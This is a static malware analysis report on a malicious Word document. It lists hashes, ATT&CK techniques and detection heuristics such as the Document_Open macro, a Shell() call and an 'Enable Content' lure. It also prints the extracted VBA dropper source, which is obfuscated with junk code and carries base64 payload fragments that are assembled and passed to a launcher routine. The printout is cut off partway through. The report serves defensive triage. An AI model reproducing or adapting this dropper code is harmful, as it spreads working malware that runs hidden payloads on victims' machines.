Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1909d3e891e93a3…

MALICIOUS

Office (OLE)

113.0 KB Created: 2018-07-27 20:36:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: a896d7f1b3b020eee5b121f1aea9f38e SHA-1: 63a8cdaf9865da0d31c802cf369ba543a9febfe3 SHA-256: f1909d3e891e93a39838f96c576942a89f5da6b0395aa8b512933b7851e706e6
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a Word document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code. The document body explicitly prompts the user to "Enable Content", a common social engineering tactic to bypass macro security. The VBA code appears to be obfuscated but the presence of Shell() and the lure strongly suggest it's designed to download and execute a second-stage payload.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.day.com/dam/1.0 In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19342 bytes
SHA-256: 69bea706a52c61f360ed3e505324ef0cd76ef2317137b7d6a68c41291b0d7ee0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
If 49 < 175 Then
' WAPUCu
Else
' ww0t5xznT
MsgBox "I9uxK6"
End If
If 883 - 16 = 25656 / 4276 Then
tWtyPx = "ih3bVoSB"
End If
Ujnflh = "BYvfj"
boLSU = tWtyPx & Ujnflh
yaZBUDfQ = "1Wc1VTdFNURWx0UW1SdGNuSmlOVUpKY1doblVWUjFkMDVyUnpKb1dHcFZZVVJRVEdzclEyeGxNekU0TWpOa1oyMVpRelpNVFZoSWEybDBRM1kyT1hSNVRtMW1VVUZsVmpjMk1FWkpiRk5hYm05bk1taERkRVYwT0hKNU56ZEJPRXMwTVcxM2IybG9ZWEZLVlU1TFNuaHFNSEEzZVVWQlRucFpXR0oyZWxjMVdrWnFabnBQT0c5eE1USm9UVFpaVW0xWFdUZ3JPWE5yZG10cU0yRXhhbEpYTjBvMU1FRXJUVVlyTjBGV1pXMHdUMkZVV1dobU4zbE5"
r85Ruc = "WbmxuT0ZSMFptVlRaMnBvWml0RU1XRkVkbmxSVVhGVmNXZ3JSMGd5TDBWaGMyWTRRVUZCUVNjcEtUc2dTVVZZSUNoT1pYY3RUMkpxWldOMElFbFBMbE4w"
Wy7rAvlTf = "Y21WaGJWSm"
Dim ei6Co
ei6Co = 27
While ei6Co < 515
ei6Co = ei6Co + 29
Wend
Ob3fOPNK9 = "cZwah6"
hXYUNiC8h = UnMmjfo & ei6Co
If 33 < 246 Then
' ZfnqYmM
Else
' ijg9GUyPO
MsgBox "j7Len"
End If
Dim DOdJw
DOdJw = 15
While DOdJw <= 367
DOdJw = DOdJw + 39
Wend
bBPQln = 6300
eG6i8 = HoD4Hu & DOdJw
Dim Rs7i4
Rs7i4 = yaZBUDfQ & r85Ruc & Wy7rAvlTf
bj9qMt = "xZV1JsY2loT1pYY3RUMkpxWldOMElFbFBMa052YlhCeVpYTnphVzl1TGtkNmFYQlRkSEpsWVcwb0pITXNXMGxQTGtOdmJY"
eoYIs = "QnlaWE56YVc5dUxrTnZiWEJ5WlhOemFXOXVUVzlrWlYwNk9rUmxZMjl0Y0hKbGMzTXBLU2t1VW1WaFpGUnZSVzVrS0NrNw=="
If 8 < 206 Then
' YkN6mL7
Else
' rvkBQ
MsgBox "US0Hi3z"
End If
If 22464 / 26 = 28130 / 5626 Then
eLDgA3t = "JChkAbngF"
End If
WoPDk = 23941
zEaih = eLDgA3t & WoPDk
Dim SiMtD
SiMtD = bj9qMt & eoYIs
TG2Zxc = "Y0c5M1pYSnphR1ZzYkNBa2N6MU9aWGN0VDJKcVpXTjBJRWxQTGsxbGJXOXllVk4wY21WaGJTZ3NXME52Ym5abGNuUmRPanBHY205dFFtRnpaVFkwVTNSeWFXNW5LQ2RJTkhOSlFVRkJRVUZCUVVGQk1GaFBVVlYyUkUxQ2FrYzRZU3RUVVhsRmRHSnRhMjV"
S81geDz = "4SzB4RFJVcDNTVXQxYVdkMWJESTRjRTV0TjBwaE5VeFJka3AxWWxOcU9UZDJXV2RsYmpjck9GQjVVelUzUW"
Dim j6ytS
j6ytS = 151
While j6ytS <= 274
j6ytS = j6ytS + 42
Wend
AwHabYjv = "KaS9zFM"
ujYNSv3hU = u62GYzTgt & j6ytS
Dim EShdX
EShdX = TG2Zxc & S81geDz
If 61 < 163 Then
' we0UStT
Else
' iqyRw
MsgBox "Mot70l8"
End If
Dim Tr1GHfmj
Tr1GHfmj = 252
While Tr1GHfmj <= 611
Tr1GHfmj = Tr1GHfmj + 41
Wend
ZTBYgb = 61960
j3uniCVD7 = EqaIKEOf1 & Tr1GHfmj
KZqmVIae = EShdX & Rs7i4 & SiMtD
If 20 < 128 Then
' gWP7w
Else
' QX2GbzRWQ
MsgBox "hwQRiK2ud"
End If
If 20 < 128 Then
' QKSMQ93wF
Else
' uDI4tBLJ
MsgBox "qDFcapCu"
End If
If 57 < 232 Then
' yQpuDW
Else
' FHMU2Wdu8
Debug.Print "XaJH4QpwC"
End If
If 996 + 8 = -141 + 148 Then
wYaAyhbtW = "ij97FXZ"
End If
GBHQCqbn = 14514
gmJWnsVfR = wYaAyhbtW & GBHQCqbn
If 20930 / 91 = 24724 / 3532 Then
CZz4nqGO = "DkiVmYTAv"
End If
GIvjL0Kc = "F3Yh8KrDi"
fT5FGqXSf = CZz4nqGO & GIvjL0Kc
Dim YrSbMwgBk
YrSbMwgBk = 82
While YrSbMwgBk <= 772
YrSbMwgBk = YrSbMwgBk + 30
Wend
A73k8h = 25755
MXtyNeCOQ = Jkdvl & YrSbMwgBk
Call Stalin(KZqmVIae)
End Sub

Attribute VB_Name = "qVnlqz"
Sub Stalin(p23Y5F)
If 13 < 149 Then
' uHwap2Acd
Else
' fh1IN8
MsgBox "nqOwS4ZV"
End If
Dim TfhoE
TfhoE = 60
While TfhoE < 803
TfhoE = TfhoE + 32
Wend
dc6zOs = "ZEVhzrT4Y"
NmjGdXb = XYm4eZ & TfhoE
If 12121 / 17 = -375 + 390 Then
QY0JOMl = "FHychL"
End If
fPs7evjQ = 9273
do1PN50JM = QY0JOMl & fPs7evjQ
If 46 < 187 Then
' mHtsLax
Else
' t9xAPOVY
Debug.Print "S8Bijr"
End If
If 19 < 162 Then
' VxAfKm
Else
' Cwt1Z4UMk
Debug.Print "RZOR6"
End If
Dim qagwUSe
qagwUSe = 90
While qagwUSe <= 816
qagwUSe = qagwUSe + 62
Wend
sQgDVcYHX = "tnlv71"
OUTtKo4 = Vh2IO & qagwUSe
Dim uauOH
uauOH = 141
While uauOH < 692
uauOH = uauOH + 56
Wend
hJPIueOB = "uJ5dmyFZ"
F1WNFvAEC = cAL8Xv & uauOH
Dim QMrwRpqeF
QMrwRpqeF = 141
While QMrwRpqeF < 692
QMrwRpqeF = QMrwRpqeF + 56
Wend
muxEbva = "xETI451"
b9yd5N = Q1amHCV4 & QMrwRpqeF
Dim bNoOrVY4
bNoOrVY4 = 245
While bNoOrVY4 <= 461
bNoOrVY4 = bNoOrVY4 + 59
Wend
IiA8OeG = "eTba5xOZl"
C
... (truncated)